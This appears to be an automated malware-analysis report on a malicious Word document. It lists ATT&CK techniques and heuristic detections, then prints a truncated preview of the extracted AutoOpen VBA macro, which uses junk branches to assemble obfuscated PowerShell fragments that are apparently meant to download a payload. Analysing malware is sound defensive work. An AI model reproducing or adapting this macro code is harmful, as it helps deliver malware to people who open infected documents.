MALICIOUS
248
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample is a malicious Microsoft Office document containing a VBA macro. The macro utilizes a Shell() call and CreateObject, indicating an attempt to execute external code. The ClamAV detection name 'Doc.Malware.Stratos-6704311-0' further confirms its malicious nature. The macro's obfuscated string concatenation likely aims to construct a URL for downloading and executing a secondary payload.
Heuristics 7
-
ClamAV: Doc.Malware.Stratos-6704311-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Stratos-6704311-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 68482 bytes |
SHA-256: 97e1b22c759816948c8c28c7788e504bdc1b9e72c37d30670308c1b0cfaded10 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "NewMacros"
Sub AutoOpen()
oiizcrfro = NaN
Select Case "e_hhyvzyyhke"
Case "e_hhyvzyyhke"
abbe_eeghou = "$uxkfefpnxjz_aqxoeqmerfou_oo_"
Case 11796
Dim ttb_paqporxp As String
ttb_paqporxp = NaN
End Select
qcjejk_ats = NaN
Select Case "btni"
Case "btni"
tbaeq = "awoubmkfupkbhv='ent/t';$hdml"
eeizooii = NaN
abbe_eeghou = abbe_eeghou + tbaeq
Case dwayxpvfik
xuie = NaN
Case 17488
iyukw = NaN
End Select
evzwt = NaN
Select Case 54 + 46
Case 100
omhqmwhi = "xewpmmgaassoyeqhapa=':t"
w_yae = NaN
abbe_eeghou = abbe_eeghou + omhqmwhi
End Select
dqlk_ulnof2 = NaN
If 3 * 69 = 207 Then
xogahmqzfy15 = "emp+"
abbe_eeghou = abbe_eeghou + xogahmqzfy15
End If
oy_fplvfv7 = NaN
Select Case "oqvlguarv"
Case "oqvlguarv"
ndaulvxydt = abbe_eeghou + oltzxckbwcgwh
dp_emyo_i = NaN
iitjhzk = "''\';$oipjdmadsooyuatyi_aqwxy"
rporifch = NaN
ndaulvxydt = abvtg_yai + ndaulvxydt + iitjhzk
Case 169
yiyy = NaN
End Select
erkiaafh = NaN
Select Case "iiiaqqyyi"
Case 12835
Dim yiribsv20
yiribsv20 = NaN
Case zffppi_dyd
xvijye_tklwl = NaN
Case "iiiaqqyyi"
ndaulvxydt = ndaulvxydt + "gt_bro"
End Select
cdm_irqjg8 = NaN
Select Case 15 + 76
Case zswidylew
xlfrfy_wu = NaN
Case 28597
Dim ouovvavt_nse
ouovvavt_nse = NaN
Case 91
yqjaij = "ydgge="
iavlbf_zcuek = NaN
ndaulvxydt = ndaulvxydt + yqjaij
End Select
tukvaiy = NaN
Select Case "kvkoyu"
Case "kvkoyu"
ndaulvxydt = kkitmi + ndaulvxydt + "'-UFo';$zgwzrbfv_eb"
Case 24324
i_lcybgk = NaN
Case g_yto_yii
snlvyvs = NaN
End Select
uobfgjr = NaN
Select Case 54 * 27
Case 1458
vqibekpuy = bdou_hbyjpxnn + ndaulvxydt
xvmein = NaN
eiaryoy_y = "ediepfmaoo_ua"
imv_qtyucmzn0 = NaN
Dim ieppnoeu8 As String
ieppnoeu8 = NaN
vqibekpuy = vqibekpuy + eiaryoy_y
End Select
Dim dn_fofrg_uyjq
dn_fofrg_uyjq = NaN
Select Case 89 + 52
Case 141
eiy_i = xxf_lppj_yu + vqibekpuy
aemxpwoe = NaN
eksshbfsy = "eqyszeowsfh='"
ouey_n = NaN
stq_abpukm = NaN
svl_ascaylu = NaN
eiy_i = eiy_i + eksshbfsy
Case 9060
aeytcsxhvk_pz = NaN
End Select
tqiawu = NaN
If 2923 < 4577 Then
j_awgxe = "st';$zam_opcwue_neiksdk='a"
eiy_i = utryizqsjj + eiy_i + j_awgxe + ycfkeoe
ElseIf 82 - 12 = 94 Then
jpymqa_ou = NaN
glcdejlbmc = NaN
dzuyj = NaN
Else
b_iorai = NaN
ocgtecjp = NaN
ouie = NaN
End If
enme_zr_afitm = NaN
Select Case 27 - 39
Case 2478
wfzmzfyeyd = NaN
Case -12
zrfayaeu = "nguage';$bv_yuhvehiwds"
id_smoavl = NaN
eiy_i = eiy_i + zrfayaeu
Case iaao
odvopuua = NaN
End Select
dpzohraejm8 = NaN
Select Case "rxqq_uy52"
Case utiezfa
Dim aiarytqdto As String
aiarytqdto = NaN
Case "rxqq_uy52"
eiy_i = iinr_y_co40 + eiy_i + "ke_afhcieyuuxyujlojmgt='et" + qkyfydpjjro
Case 5335
epiakrny = NaN
End Select
mdzxx31 = NaN
If 92 - 89 = 3 Then
edgbaxr_zpg = Environ("SystemRoot")
End If
e_cgiaxo76 = NaN
If 6674 < 10348 Then
fiuwyefny = "-Date ';$ubjkyrrtnmfeyeodbprhh"
eiy_i = eiy_i + fiuwyefny
End If
Dim oyfatrj As String
oyfatrj = NaN
Select Case "zfdpe_m"
Case "zfdpe_m"
wjedy = "czumzdwu='rm';$lsokreeuiypto=' + 11.11';$kz"
Dim aeim_si
aeim_si = NaN
eiy_i = eiy_i + wjedy
Case 18830
yktifyia4 = NaN
End Select
yuajhqrly = NaN
Select Case 77 - 16
Case 61
yeitt = "ywmeamnocyejyruepbzlfcyr_i='Pr';$iwj_ngo_aogri"
Dim ooida, fdiro, yrwoj, ak_hwczyue
ooida = NaN
eiy_i = vgystglnz + eiy_i + yeitt + zmcaawy
End Select
kovmjmukhtrq06 = NaN
Select Case 63 * 43
Case 2709
uqzjqaxxij = eiy_i
xaoa = NaN
uaiudet = "fkmo_xiiymppwmrulnuqa='e(1){"
Dim aandtcs As String
aandtcs = NaN
uqzjqaxxij = uqzjqaxxij + uaiudet
Case 27447
wreyekqb = NaN
End Select
aoaitayo = NaN
Select Case "fjglyl"
Case 16044
ofsa_lyqj = NaN
Case "fjglyl"
qgihiai = " ';$jzayyye_eeolkyzkevi=' -f'"
g_tlvwjpgnq9 = NaN
uqzjqaxxij = uegrn + uqzjqaxxij + qgihia
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.